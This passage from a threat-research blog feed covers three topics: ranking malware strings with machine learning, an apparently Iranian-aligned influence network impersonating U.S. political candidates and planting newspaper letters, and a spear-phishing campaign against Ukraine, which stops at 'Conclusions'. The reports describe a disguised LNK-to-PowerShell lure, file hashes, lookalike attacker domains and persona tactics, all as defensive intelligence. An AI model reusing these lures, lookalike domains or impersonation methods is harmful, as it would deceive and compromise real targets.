In the initial train() step of Figure 2, over 25 thousand binaries are run through the Strings program to generate training data consisting of over 18 million total strings. Each training sample then corresponds to the concatenated list of ASCII and Unicode strings output by the Strings program on that input file. To train the model, these raw strings are transformed into numerical vectors containing natural language processing features like Shannon entropy and character co-occurrence frequencies, together with domain-specific signals like the presence of indicators of compromise (e.g. file paths, IP addresses, URLs, etc.), format strings, imports, and other relevant landmarks.

Figure 2: The ML-based LTR framework ranks strings based on their relevance for malware analysis. This figure illustrates different steps of the machine learning modeling process: the initial train() step is denoted by solid arrows and boxes, and the subsequent predict() and sort() steps are denoted by dotted arrows and boxes.

Each transformed string’s feature vector is associated with a non-negative integer label that represents their relevance for malware analysis. Labels range from 0 to 7, with higher numbers indicating increased relevance. To generate these labels, we leverage the subject matter knowledge of FLARE analysts to apply heuristics and impose high-level constraints on the resulting label distributions. While this weak supervision approach may generate noise and spurious errors compared to an ideal case where every string is manually labeled, it also provides an inexpensive and model-agnostic way to integrate domain expertise directly into our GBDT model.

Next during the predict() step of Figure 2, we use the trained GBDT model to predict ranks for the strings belonging to an input file that was not originally part of the training data, and in this example query we use the Strings output shown in Figure 1. The model predicts ranks for each string in the query as floating-point numbers that represent expected relevance scores, and in the final sort() step of Figure 2, strings are sorted in descending order by these scores. Figure 3 illustrates how this resulting prediction achieves the desired goal of ranking strings according to their relevance for malware analysis.

Figure 3: The resulting ranking on the strings depicted in both Figure 1 and in the truncated query of Figure 2. Contrast the relative ordering of the strings shown here to those otherwise identical lists.

The predicted and sorted string rankings in Figure 3 show network-based indicators on top of the list, followed by registry paths and entries. These reveal the potential C2 server and malicious behavior on the host. The subsequent output consisting of user-related information is more likely to be benign, but still worthy of investigation. Rounding out the list are common strings like Windows API functions and PE artifacts that tend to raise no red flags for the malware analyst.

Quantitative Evaluation

While it seems like the model qualitatively ranks the above strings as expected, we would like some quantitative way to assess the model’s performance more holistically. What evaluation criteria can we use to convince ourselves that the model generalizes beyond the coverage of our weak supervision sources, and to compare models that are trained with different parameters?

We turn to the recommender systems literature, which uses the Normalized Discounted Cumulative Gain (NDCG) score to evaluate ranking of items (i.e. individual strings) in a collection (i.e. a Strings output). NDCG sounds complicated, but let’s boil it down one letter at a time:

“G” is for gain, which corresponds to the magnitude of each string’s relevance.
“C” is for cumulative, which refers to the cumulative gain or summed total of every string’s relevance.
“D” is for discounted, which divides each string’s predicted relevance by a monotonically increasing function like the logarithm of its ranked position, reflecting the goal of having the most relevant strings ranked towards the top of our predictions.
“N” is for normalized, which means dividing DCG scores by ideal DCG scores calculated for a ground truth holdout dataset, which we obtain from FLARE-identified relevant strings contained within historical malware reports. Normalization makes it possible to compare scores across samples since the number of strings within different Strings outputs can vary widely.

Figure 4: Kernel Density Estimate of NDCG@100 scores for Strings outputs from the holdout dataset. Scores are calculated for the original ordering after simply running the Strings program on each binary (gray) versus the predicted ordering from the trained GBDT model (red).

In practice, we take the first k strings indexed by their ranks within a single Strings output, where the k parameter is chosen based on how many strings a malware analyst will attend to or deem relevant on average. For our purposes we set k = 100 based on the approximate average number of relevant strings per Strings output. NDCG@k scores are bounded between 0 and 1, with scores closer to 1 indicating better prediction quality in which more relevant strings surface towards the top. This measurement allows us to evaluate the predictions from a given model versus those generated by other models and ranked with different algorithms.

To quantitatively assess model performance, we run the strings from each sample that have ground truth FLARE reports though the predict() step of Figure 2, and compare their predicted ranks with a baseline of the original ranking of strings output by Strings. The divergence in distributions of NDCG@100 scores between these two approaches demonstrates that the trained GBDT model learns a useful structure that generalizes well to the independent holdout set (Figure 4).

Conclusion

In this blog post, we introduced an ML model that learns to rank strings based on their relevance for malware analysis. Our results illustrate that it can rank Strings output based both on qualitative inspection (Figure 3) and quantitative evaluation of NDCG@k (Figure 4). Since Strings is so commonly applied during malware analysis at FireEye and elsewhere, this model could significantly reduce the overall time required to investigate suspected malicious binaries at scale. We plan on continuing to improve its NDCG@k scores by training it with more high fidelity labeled data, incorporating more sophisticated modeling and featurization techniques, and soliciting further analyst feedback from field testing.

It’s well known that malware authors go through great lengths to conceal useful strings from analysts, and a potential blind spot to consider for this model is that the utility of Strings itself can be thwarted by obfuscation. However, open source tools like the FireEye Labs Obfuscated Strings Solver (FLOSS) can be used as an in-line replacement for Strings. FLOSS automatically extracts printable strings just as Strings does, but additionally reveals obfuscated strings that have been encoded, packed, or manually constructed on the stack. The model can be readily trained on FLOSS outputs to rank even obfuscated strings. Furthermore, since it can be applied to arbitrary lists of strings, the model could also be used to rank strings extracted from live memory dumps and sandbox runs.

This work represents a collaboration between the FDS and FLARE teams, which together build predictive models to help find evil and improve outcomes for FireEye’s customers and products. If you are interested in this mission, please consider joining the team by applying to one of our job openings.

Network of Social Media Accounts Impersonates U.S. Political Candidates, Leverages U.S. and Israeli Media in Support of Iranian Interests

Threat Research

Alice Revelli

28 May 2019 at 19:00

In August 2018, FireEye Threat Intelligence released a report exposing what we assessed to be an Iranian influence operation leveraging networks of inauthentic news sites and social media accounts aimed at audiences around the world. We identified inauthentic social media accounts posing as everyday Americans that were used to promote content from inauthentic news sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front. We also noted a then-recent shift in branding for some accounts that had previously self-affiliated with LFP; in July 2018, the accounts dropped their LFP branding and adopted personas aligned with progressive political movements in the U.S. Since then, we have continued to investigate and report on the operation to our intelligence customers, detailing the activity of dozens of additional sites and hundreds of additional social media accounts.

Recently, we investigated a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation and that we assess with low confidence was organized in support of Iranian political interests. In addition to utilizing fake American personas that espoused both progressive and conservative political stances, some accounts impersonated real American individuals, including a handful of Republican political candidates that ran for House of Representatives seats in 2018. Personas in this network have also had material published in U.S. and Israeli media outlets, attempted to lobby journalists to cover specific topics, and appear to have orchestrated audio and video interviews with U.S. and UK-based individuals on political issues. While we have not at this time tied these accounts to the broader influence operation we identified last year, they promoted material in line with Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin. Most of the accounts in the network appear to have been suspended on or around the evening of 9 May, 2019. Appendix 1 provides a sample of accounts in the network.

The Network

The accounts, most of which were created between April 2018 and March 2019, used profile pictures appropriated from various online sources, including, but not limited to, photographs of individuals on social media with the same first names as the personas. As with some of the accounts that we identified to be of Iranian origin last August, some of these new accounts self-described as activists, correspondents, or “free journalist[s]” in their user descriptions. Some accounts posing as journalists claimed to belong to specific news organizations, although we have been unable to identify individuals belonging to those news organizations with those names.

Narratives promoted by these and other accounts in the network included anti-Saudi, anti-Israeli, and pro-Palestinian themes. Accounts expressed support for the Joint Comprehensive Plan of Action (JCPOA), commonly known as the Iran nuclear deal; opposition to the Trump administration’s designation of Iran’s Islamic Revolutionary Guard Corps (IRGC) as a Foreign Terrorist Organization; antipathy toward the Ministerial to Promote a Future of Peace and Security in the Middle East (a U.S.-led conference that focused on Iranian influence in the Middle East more commonly known as the February 2019 Warsaw Summit); and condemnation of U.S. President Trump’s veto of a resolution passed by Congress to end U.S. involvement in the Yemen conflict.

Figure 1: Sample tweets on the Trump administration’s designation of Iran’s IRGC as a Foreign Terrorist Organization

Interestingly, some accounts in the network also posted a small amount of messaging seemingly contradictory to their otherwise pro-Iran stances. For example, while one account’s tweets were almost entirely in line with Iranian political interests, including a tweet claiming that “iran has shown us that his nuclear program is peaceful [sic],” the account also posted a series of tweets directed at U.S. President Trump on Sept. 25, 2018, the same day that he gave a speech to the United Nations in which he excoriated the Iranian Government. The account called on Trump to attack Iran, using the hashtags #attack_Iran, #go_to_hell_Rouhani, #stop_sanctions, #UnitedNations, and #trump_speech; other accounts in the network, which likewise predominantly held pro-Iran stances, echoed these sentiments, using the same or similar hashtags. It is possible that these accounts were seeking to build an audience with views antipathetic to Iran that could then later be targeted with pro-Iranian messaging.

Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature. Subsequently in 2017, @AlexRyanNY claimed in a tweet to be “an Iranian who supported Hillary” in a tweet directed at a Democratic political strategist. This account, using the display name “Alex Ryan” and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex. We note that it is possible that the account was compromised from another individual or that it was merely repurposed by the same actor. Additionally, while most of the accounts in the network had their interface languages set to English, we observed that one account had its interface language set to Persian.

Impersonation of U.S. Political Candidates

Some Twitter accounts in the network impersonated Republican political candidates that ran for House of Representatives seats in the 2018 U.S. congressional midterms. These accounts appropriated the candidates’ photographs and, in some cases, plagiarized tweets from the real individuals’ accounts. Aside from impersonating real U.S. political candidates, the behavior and activity of these accounts resembled that of the others in the network.

For example, the account @livengood_marla impersonated Marla Livengood, a 2018 candidate for California’s 9^th Congressional District, using a photograph of Livengood and a campaign banner for its profile and background pictures. The account began tweeting on Sept. 24, 2018, with its first tweet plagiarizing one from Livengood’s official account earlier that month:

Figure 2: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 1, 2018 (right)

The @livengood_marla account plagiarized a number of other tweets from Livengood’s official account, including some that referenced Livengood’s official account username:

Figure 3: Tweet by suspect account @livengood_marla, dated Sept. 24, 2018 (left); tweet by Livengood’s verified account, dated Sept. 3, 2018 (right)

The @livengood_marla account also tweeted various news snippets on both political and apolitical subjects, such as the confirmation of Brett Kavanaugh to the U.S. Supreme Court and the wedding of the UK’s Princess Eugenie and Jack Brooksbank, prior to segueing into promoting material more closely aligned with Iranian interests. For example, the account, along with others in the network, commemorated the United Nations’ International Day of the Girl Child with a photograph of emaciated children in Yemen, as well as narratives pertaining to the killing of Saudi journalist Jamal Khashoggi and Saudi Shiite child Zakaria al-Jaber, intended to portray Saudi Arabia in a negative light.

In another example, the account @ButlerJineea impersonated Jineea Butler, a 2018 candidate for New York’s 13^th Congressional District, using a photograph of Butler for its profile picture and incorporating her campaign slogans into its background picture, as well as claiming in its Twitter bio to be a “US House candidate, NY-13” and linking to Butler’s website, jineeabutlerforcongress.com.

Figure 4: Suspect account @ButlerJineea (left); apparent legitimate, currently inactive account @Jineea4congress (right)

These and other accounts in the network plagiarized tweets from additional sources beyond the individuals they impersonated, including other U.S. politicians, about both political and apolitical topics.

Influence Activity Leveraged U.S. and Israeli Media

In addition to directly posting material on social media, we observed some personas in the network leverage legitimate print and online media outlets in the U.S. and Israel to promote Iranian interests via the submission of letters, guest columns, and blog posts that were then published. We also identified personas that we suspect were fabricated for the sole purpose of submitting such letters, but that do not appear to maintain accounts on social media. The personas claimed to be based in varying locations depending on the news outlets they were targeting for submission; for example, a persona that listed their location as Seattle, WA in a letter submitted to the Seattle Times subsequently claimed to be located in Baytown, TX in a letter submitted to The Baytown Sun. Other accounts in the network then posted links to some of these letters on social media.

The letters and columns, many of which were published in 2018 and 2019, but which date as far back as 2015, were mostly published in small, local U.S. news outlets; however, several larger outlets have also published material that we suspect was submitted by these personas (see Appendix 2). In at least two cases, the text of letters purportedly authored by different personas and published in different newspapers was identical or nearly identical, while in other instances, separate personas promoted the same narratives in letters published within several days of each other. The published material was not limited to letters; one persona, “John Turner,” maintained a blog on The Times of Israel website from January 2017 to November 2018, and wrote articles for the U.S.-based site Natural News Blogs from August 2015 to July 2018. The letters and articles primarily addressed themes or promoted stances in line with Iranian political interests, similar to the activity conducted on social media.

Figure 5: Sample letter published in Galveston County’s (Texas) The Daily News, authored by suspect persona Mathew O’Brien

We have thus far identified at least five suspicious personas that have had letters or other content published by legitimate news outlets. We surmise that additional personas exist, based on other investigatory leads.

“John Turner”: The John Turner persona has been active since at least 2015. Turner has claimed to be based, variously, in New York, NY, Seattle, WA, and Washington, DC. Turner described himself as a journalist in his Twitter profile, though has also claimed both to work at the Seattle Times and to be a student at Villanova University, claiming to be attending between 2015 and 2020. In addition to letters published in various news outlets, John Turner maintained a blog on The Times of Israel site in 2017 and 2018 and has written articles for Natural News Blogs. At least one of Turner’s letters was promoted in a tweet by another account in the network.

“Ed Sullivan”: The Ed Sullivan persona, which has on at least one occasion used the same headshot as that of John Turner, has had letters published in the Galveston County, Texas-based The Daily News, the New York Daily News, and the Los Angeles Times, including some letters identical in text to those authored by the “Jeremy Watte” persona (see below) published in the Texas-based outlet The Baytown Sun. Ed Sullivan has claimed his location to be, variously, Galveston and Newport News (Virginia).

“Mathew Obrien”: The Mathew Obrien persona, whose name has also been spelled “Matthew Obrien” and “Mathew O’Brien”, claimed in his Twitter bio to be a Newsday correspondent. The persona has had letters published in Galveston County’s The Daily News and the Athens, Texas-based Athens Daily Review; in those letters, his claimed locations were Galveston and Athens, respectively, while the persona’s Twitter account, @MathewObrien1, listed a location of New York, NY. At least one of Obrien’s letters was promoted in a tweet by another account in the network.

“Jeremy Watte”: Letters signed by the Jeremy Watte persona have been published in The Baytown Sun and the Seattle Times, where he claimed to be based in Baytown and Seattle, respectively. The texts of at least two letters signed by Jeremy Watte are identical to that in letters published in other newspapers under the name Ed Sullivan. At least one of his letters was promoted in a tweet by another account in the network.

“Isabelle Kingsly”: The Isabelle Kingsly persona claimed on her Twitter profile (@IsabelleKingsly) to be an “Iranian-American” based in Seattle, WA. Letters signed by Kingsly have appeared in The Baytown Sun and the Newport News Virginia local paper The Daily Press; in those letters, Kingsly’s location is listed as Galveston and Newport News, respectively. The @IsabelleKingsly Twitter account’s profile picture and other posted pictures were appropriated from a social media account of what appears to be a real individual with the same first name of Isabelle. At least one of Kingsly’s letters was promoted in a tweet by another account in the network.

Other Media Activity

Personas in the network also engaged in other media-related activity, including criticism and solicitation of mainstream media coverage, and conducting remote video and audio interviews with real U.S. and UK-based individuals while presenting themselves as journalists. One of those latter personas presented as working for a mainstream news outlet.

Criticism/Solicitation of Media Coverage

Accounts in the network directed tweets at mainstream media outlets, calling on them to provide coverage of topics aligned with Iranian interests or, alternatively, criticizing them for insufficient coverage of those topics. For example, we observed accounts criticizing media outlets over their lack of coverage of the killing of Shiite child Zakaria al-Jaber in Saudi Arabia, as well as Saudi Arabia’s conduct in the Yemen conflict. While such activity might have been intended to directly influence the media outlets’ reporting, the accounts may have also been aiming to reach a wider audience by tweeting at outlets with a large following that woud see those replies.

Figure 6: Sample tweets by suspect accounts calling on mainstream media outlets to increase their coverage of alleged Saudi activity in the Yemen conflict

“Media” Interviews with Real U.S., UK-Based Individuals

Accounts in the network, under the guise of journalist personas, also solicited various individuals over Twitter for interviews and chats, including real journalists and politicians. The personas appear to have successfully conducted remote video and audio interviews with U.S. and UK-based individuals, including a prominent activist, a radio talk show host, and a former U.S. Government official, and subsequently posted the interviews on social media, showing only the individual being interviewed and not the interviewer. The interviewees expressed views that Iran would likely find favorable, discussing topics such as the February 2019 Warsaw summit, an attack on a military parade in the Iranian city of Ahvaz, and the killing of Jamal Khashoggi.

The provenance of these interviews appear to have been misrepresented on at least one occasion, with one persona appearing to have falsely claimed to be operating on behalf of a mainstream news outlet; a remote video interview with a US-based activist about the Jamal Khashoggi killing was posted by an account adopting the persona of a journalist from the outlet Newsday, with the Newsday logo also appearing in the video. We did not identify any Newsday interview with the activist in question on this topic. In another instance, a persona posing as a journalist directed tweets containing audio of an interview conducted with a former U.S. Government official at real media personalities, calling on them to post about the interview.

Conclusion

We are continuing to investigate this and potentially related activity that may be being conducted by actors in support of Iranian interests. At this time, we are unable to provide further attribution for this activity, and we note the possibility that the activity could have been designed for alternative purposes or include some small percentage of authentic behavior. However, if it is of Iranian origin or supported by Iranian state actors, it would demonstrate that Iranian influence tactics extend well beyond the use of inauthentic news sites and fake social media personas, to also include the impersonation of real individuals on social media and the leveraging of legitimate Western news outlets to disseminate favorable messaging. If this activity is being conducted by the same or related actors as those responsible for the Liberty Front Press network of inauthentic news sites and affiliated social media accounts that we exposed in August 2018, it may also suggest that these actors remain undeterred by public exposure or by social media platforms’ shutdowns of their accounts, and that they continue to seek to influence audiences within the U.S. toward positions in line with Iranian political interests.

Appendices

Appendix 1: Sample Twitter accounts identified in this network, currently suspended.

Username	Display Name	Bio	Creation Date	Location
@MichaelA22444	Michael Anderson	Free journalist #resist	3/16/2019	DC
@sammichelsn1995	Sam Michelson	Journalist. In search of reality. 1995. Resistance.	3/14/2019
@JasonCa26738291	Jason Campbell	It’s our duty to leave our Country-to our children-better than we found it	2/20/2019
@SaraMar44752473	Sara Martin		1/24/2019
@LisaBro09759828	Lisa Brown		1/24/2019
@Jennife67352965	Jennifer Parker	I AM	1/23/2019
@SusanSc25255529	Susan Scott	Don't think too hard, just have fun with life...	1/22/2019
@LindaJa02370118	Linda Jackson	I drink lots of tea...	1/22/2019
@MarkAda05568324	Mark Adams		1/22/2019
@aliisseeeee	alliisse	Liberty	1/21/2019	New York
@morsi18	morsi		1/13/2019
@AntiReality2	Anti_Reality	Very angry mad at politicians In favor of sick minds	1/9/2019	North Carolina, USA
@JennyMick3	Jenny Mick	Unemployment Widow mother of two	1/9/2019	Pennsylvania, USA
@JaneAnton9	Jane Anton	Daughter of best parent. Do your best, just let your success shows your efforts.	1/9/2019	California, USA
@RabinAntonio	Antonio Rabin	Student at Harvard college. somehow into politics. I love gym	1/9/2019
@Angelofhuman1	Angel of human	I do into beauty and humanity	12/26/2018	California, USA
@AliciaHernan3	Alicia Hernan	Wife, mom of tow sons, student, in favor of peace.	12/26/2018	New York, USA
@ThomasRace3	Thomas Race	Bodybuilding sports and into Music and gym	12/25/2018	Michigan, USA
@EmmaWil14155495	Emma Wilkerson	Student in college studying International law	12/25/2018	Sunnyvale, CA
@Kevin24798000	Kevin	A free person from everywhere I'm somehow into politics	12/15/2018	New York, USA
@ImanRashedii	Iman Rashed	Correspondent at https://t.co/3hxSgtkuXh. 🎥📸Freelance Journalist. ➡️➡️oppose War and Brutality 💆‍♂️I was born in Beirut	12/8/2018	London
@emAnderson1996	emily anderson	In search of peace. Really into politics and justice. Love US and other countries.	10/6/2018	New York, USA
@FordNaava	naava ford		10/2/2018
@MaazRoss	maaz ross	follow back	9/30/2018
@sam86523055	ResistSam	high educated free journalist in favor of politics in search of reality Middle East issues	9/29/2018	New York, USA
@ButlerJineea	Jineea Butler	US House candidate, NY-13	9/26/2018	U.S. Congressional Candidate for NY District 13 serving Harlem, Washington Heights and Western Bronx.US
@TynioAnya	Anya Tynio		9/26/2018
@livengood_marla	Marla Livengood		9/23/2018
@Fall_Of_Amercia	Fall_of_Amercia	save the US	9/8/2018	Washington, DC
@IsabelleKingsly	Elizabeth Warren not for 2020	Single. Iranian-American. Lifestyle.And a tad of politics. @ewarren not for 2020.	9/8/2018	Seattle, WA
@MathewObrien1	Mathew Obrien	A single boy,@Newsday correspondent , interested in news Scientist🔬. Animal 🐘 and Nature lover🌲, hiker and backpacker♍ .	6/21/2018	New York, NY
@HumanBeingUSA	Human-Rights	The fight for human rights never sleeps, standing up for human rights across the world, wherever justice, freedom, fairness and truth are denied.	6/14/2018	New York, USA
@ashleyc57528342	ashley cohen	follow me to get follow back	6/14/2018	Arizona, USA
@josefsanchezzzz	josef sanchez		6/10/2018
@GuillouJan	jan guillou		5/13/2018
@saidqutb2	saidqutb		5/12/2018
@olegkashin4321	rajat sharma		5/8/2018
@Suzan_Nicolson	Suzan Nicholson	follow me to get follow back	5/8/2018	Las Vegas, NV
@caroloffoff	diana culi		5/7/2018
@hairullomirsaid	guillem balague		5/7/2018
@habibayyoub1	habib ayyoub		5/6/2018
@daphneposh	James Anderson	No Magats 🚫, 🔥 Anti War & Hate, Pro Equality, Humanity, Humor & Sensible Gun Reform	4/30/2018	New York, USA
@JohnHoward333	John H.T	Journalist. RTs Are not necessarily endorsements. All views my own. #Resist	5/12/2015	Washington, USA
@AlexRyanNY	Alex Ryan	New Yorker, @Newsday correspondent. You don't have a soul. You are a Soul. You have a body.	4/17/2011	New York, USA

Table 1: Sample Twitter accounts identified in this network

Appendix 2: Sample letters published in news outlets submitted by personas identified in this network, August 2018 to April 2019.

Date	Author	Author’s Listed Location	Newspaper	Article
Aug. 1, 2018	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Trump’s wall just a vanity project” The letter argues against the Trump administration’s proposed border wall with Mexico. The text of the letter is identical to that published in Galveston County’s The Daily News (galvnews.com) on Aug. 4, 2018, three days later. http://baytownsun.com/opinion/article_85fa9df4-9527-11e8-9aa8-1bb745e7141a.html
Aug. 4, 2018	Ed Sullivan	Galveston	Galveston County’s The Daily News (galvnews.com)	Title: “Trump cares not one wit about effects of shutdown” The text of the letter is identical to that published in The Baytown Sun on Aug. 1. https://www.galvnews.com/opinion/guest_columns/article_7d5b3e9b-cbdd-5ac8-8c91-3a1eb0da3df7.html
Oct. 11, 2018	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Time to fight for it” The letter, written from the point of view of an individual aligned with the U.S. political left, calls on individuals to fight for justice. http://baytownsun.com/opinion/article_915fde6c-ccf3-11e8-a085-33dce44563d1.html
Oct. 23, 2018	Ed Sullivan	Newport News	New York Daily News (nydailynews.com)	Title: “Don’t shrug off Khashoggi’s murder” The letter argues that “the most fitting and best memorial to Jamal Khashoggi,” a Saudi journalist who was murdered in the Saudi embassy in Istanbul, “would be the swift end to the war in Yemen.” https://www.nydailynews.com/dp-edt-letswed-1024-story.html
Oct. 23, 2018	Ed Sullivan	Newport News	Los Angeles Times (latimes.com)	Title: “Don’t shrug off Khashoggi’s murder” The letter is identical to that published in the New York Daily News on the same day. https://www.latimes.com/dp-edt-letswed-1024-story.html
Nov. 27, 2018	John Turner	New York, NY	Times of Israel (blog.timesofisrael.com)	Title: “Saudi Arabia’s foreign policy is failing” The letter states that the murder of Jamal Khashoggi is “the latest in a series of foreign policy blunders” committed by the Saudi Crown Prince Mohammed Bin Salman. https://blogs.timesofisrael.com/saudi-arabias-foreign-policy-is-failing/
Nov. 30, 2018	John Turner	New York, NY	Times of Israel (blog.timesofisrael.com)	Title: “Relations with Israel will not benefit Gulf states” The letter argues that the Gulf states will not benefit from normalized relations with Israel, stating that “the Arab street” would not support those relations and that such a move would be risky for “the Gulf’s unelected rulers.” https://blogs.timesofisrael.com/relations-with-israel-will-not-benefit-gulf-states/
Dec. 26, 2018	Isabelle Kingsly	Galveston	The Baytown Sun (baytownsun.com)	Title: “Wild West sheriff” The letter argues that Trump is not an aberration in U.S. history, but rather an ideological descendant of various U.S. historical currents; the article also calls him “an authoritarian, racist madman.” http://baytownsun.com/opinion/letters/article_4ad26b8c-08bb-11e9-9056-3f5207ea4cf7.html
Jan. 18, 2019	Jeremy Watte	Seattle	Seattle Times (seattletimes.com)	Title: “ISIS’ ideology not defeated” The letter, written in response to an article about Americans killed by an ISIS suicide bomber in Syria, asserts that the Islamic extremist ideology espoused by the terrorist group remains undefeated. https://www.seattletimes.com/opinion/letters-to-the-editor/isis-ideology-not-defeated/
March 1, 2019	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Sins of Saudi Arabia” The letter is condemnatory of Saudi Arabia, citing its actions in the Yemen conflict, the killing of Jamal Khashoggi, the killing of Zakaria al-Jaber, a Shiite child, in Medina, and the imprisonment of Saudi women activists. The letter also defends Iran, stating that it is not responsible for similar crimes. http://baytownsun.com/opinion/article_4c8f1d4e-3bce-11e9-a391-37761ca39ef2.html
April 9, 2019	Mathew Obrien	Galveston	Galveston County’s The Daily News (galvnews.com)	Title: “Sanctioning Islamic corps is pure madness” The letter condemns the Trump administration’s designation of the IRGC as a Foreign Terrorist Organization and claims that Trump is seeking to start a war with Iran. https://www.galvnews.com/opinion/letters_to_editor/article_860e6c9b-1e22-5871-a1ea-d8d466fccc94.html
April 11, 2019	Matthew Obrien	Athens	Athens Daily Review (athensreview.com)	Title: “Trump, Bolton trying to start war with Iran” The letter, similar to the April 9 letter published in Galveston County’s The Daily News, claims that Trump and Bolton are trying to start a war with Iran to use the war in Trump’s 2020 presidential campaign, while disregarding the alleged crimes of Saudi Arabia. https://www.athensreview.com/opinion/letters_to_the_editor/trump-bolton-trying-to-start-war-with-iran/article_e41a029e-5ca5-11e9-b59b-4f174bf94dcd.html
April 11, 2019	Isabelle Kingsly	Newport News	Daily Press (dailypress.com)	Title: “An uneasy path – Re; Recent Iran sanction reports” The letter also argues that Trump and Bolton are seeking to start a war with Iran toward political ends. https://www.dailypress.com/news/opinion/letters/dp-edt-letsfri-0412-story.html
April 19, 2019	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Escalating hostility toward Iran” The letter argues that the election of Trump to the U.S. presidency has set the U.S. on a dangerous course and condemns the U.S. withdrawal from the Iran nuclear deal (JCPOA), stating that “the ayatollahs have welcomed this abrogation of honor on Trump’s part.” http://baytownsun.com/opinion/article_fd3f8bfa-6249-11e9-992a-d373a2b5a5a4.html
April 23, 2019	Ed Sullivan	Galveston	Galveston County’s The Daily News (galvnews.com)	Title: “Escalating hostility toward Iran is wrong, dangerous” The text of this letter is nearly identical to that authored by Jeremy Watte and published in The Baytown Sun on April 19, excepting changes made in several sentences. https://www.galvnews.com/opinion/letters_to_editor/article_0409879b-fff9-5ab8-bbf5-a49a1c1592d9.html

Table 2: Sample letters published in news outlets submitted by personas in this network

Spear Phishing Campaign Targets Ukraine Government and Military; Infrastructure Reveals Potential Link to So-Called Luhansk People's Republic

Threat Research

John Hultquist

16 April 2019 at 07:00

In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.

This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014. The email is linked to activity that previously targeted the Ukrainian Government with RATVERMIN. Infrastructure analysis indicates the actors behind the intrusion activity may be associated with the so-called Luhansk People's Republic (LPR).

The spear phishing email, sent on Jan. 22, 2019, used the subject "SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD," and the sender was forged as Armtrac, a defense manufacturer in the United Kingdom (Figure 1).

Figure 1: The spear phishing email

The email included an attachment with the filename "Armtrac-Commercial.7z" (MD5: 982565e80981ce13c48e0147fb271fe5). This 7z package contained "Armtrac-Commercial.zip" (MD5: e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents and one malicious LNK file with a substituted icon (Figure 2).

Figure 2: LNK with substituted icon

Armtrac-20T-with-Equipment-35078.pdf (MD5: 0d6a46eb0d0148aafb34e287fcafa68f) is a benign document from the official Armtrac website.
SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf (MD5: bace12f3be3d825c6339247f4bd73115) is a benign document from the official Armtrac website.
SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk (MD5: ec0fb9d17ec77ad05f9a69879327e2f9) is a malicious LNK file that executes a PowerShell script. Interestingly, while the LNK file used a forged extension to impersonate a PDF document, the icon was replaced with a Microsoft Word document icon.

Sponsor Potentially Active Since 2014

Compilation times indicate that this actor, who focused primarily on Ukraine, may have been active since at least 2014. Their activity was first reported by FireEye Threat Intelligence in early 2018. They gradually increased in sophistication and leveraged both custom and open-source malware.

The 2018 campaign used standalone EXE or self-extracting RAR (SFX) files to infect victims. However, their recent activity showed increased sophistication by leveraging malicious LNK files. The group used open-source QUASARRAT and the RATVERMIN malware, which we have not seen used by any other groups. Domain resolutions and malware compile times suggest this group may have been active as early as 2014. Filenames and malware distribution data suggest the group is primarily focused on targeting Ukrainian entities.

Association With So-Called Luhansk People's Republic

FireEye Threat Intelligence analysis uncovered several indications that the actors behind this activity have ties to the breakaway so-called Luhansk People's Republic (LPR).

Registrant Overlap with Official So-Called LPR Website

Infrastructure analysis suggests these operators are linked to the so-called LPR and the persona "re2a1er1." The domain used as C&C by the previous LNK file (sinoptik[.]website) was registered under the email "[email protected]." The email address also registered the following domains.

Domains Registered by [email protected]	Possible Mimicked Domains	Description	Possible Targeted Country
24ua[.]website	24tv.ua	A large news portal in Ukraine	UA
censor[.]website	censor.net.ua	A large news portal in Ukraine	UA
fakty[.]website	fakty.ua	A large news portal in Ukraine	UA
groysman[.]host	Volodymyr Borysovych Groysman	V. B. Groysman is a politician who has been the Prime Minister of Ukraine since April 14, 2016	UA
gordon.co[.]ua	gordonua.com	A large mail service in Ukraine	UA
mailukr[.]net	ukr.net	A large news portal in Ukraine	UA
me.co[.]ua	me.gov.ua	Ukraine's Ministry of Economic Development and Trade	UA
novaposhta[.]website	novaposhta.ua	Ukraine's largest logistics services company	UA
olx[.]website	olx.ua	Ukraine's largest online ad platform	UA
onlineua[.]website	online.ua	A large news portal in Ukraine	UA
rst[.]website	rst.ua	One of the largest car sales websites in Ukraine	UA
satv[.]pw	Unknown	TV-related	UA
sinoptik[.]website	sinoptik.ua	The largest weather website in Ukraine	UA
spectator[.]website	spectator.co.uk	A large news portal in the UK	UK
tv.co[.]ua	Unknown	TV-related	UA
uatoday[.]website	uatoday.news	A large news portal in Ukraine	UA
ukrposhta[.]website	ukrposhta.ua	State Post of Ukraine	UA
unian[.]pw	unian.net	A large news portal in Ukraine	Unknown
vj2[.]pw	Unknown	Unknown	UA
xn--90adzbis.xn--c1avg	Not Applicable	Punycode of Ministry of State Security of the So-Called Luhansk People’s Republic’s website	UA
z1k[.]pw	zik.ua	A large news portal in Ukraine	UA
milnews[.]info	Unknown	Military news	UA

Table 1: Related infrastructure

One of the domains, "xn--90adzbis.xn--c1avg" is a Punycode of "мгблнр.орг," which is the official website of the Ministry of State Security of the So-Called LPR (Figure 3). Ukraine legislation describes so-called LPR as "temporarily occupied territory" and its government as an "occupying administration of the Russian Federation."

Figure 3: Official website of the Ministry of State Security of the So-Called Luhansk People's Republic (МГБ ЛНР - Министерство Государственной Безопасности Луганской Народной Республики)

Conclusions

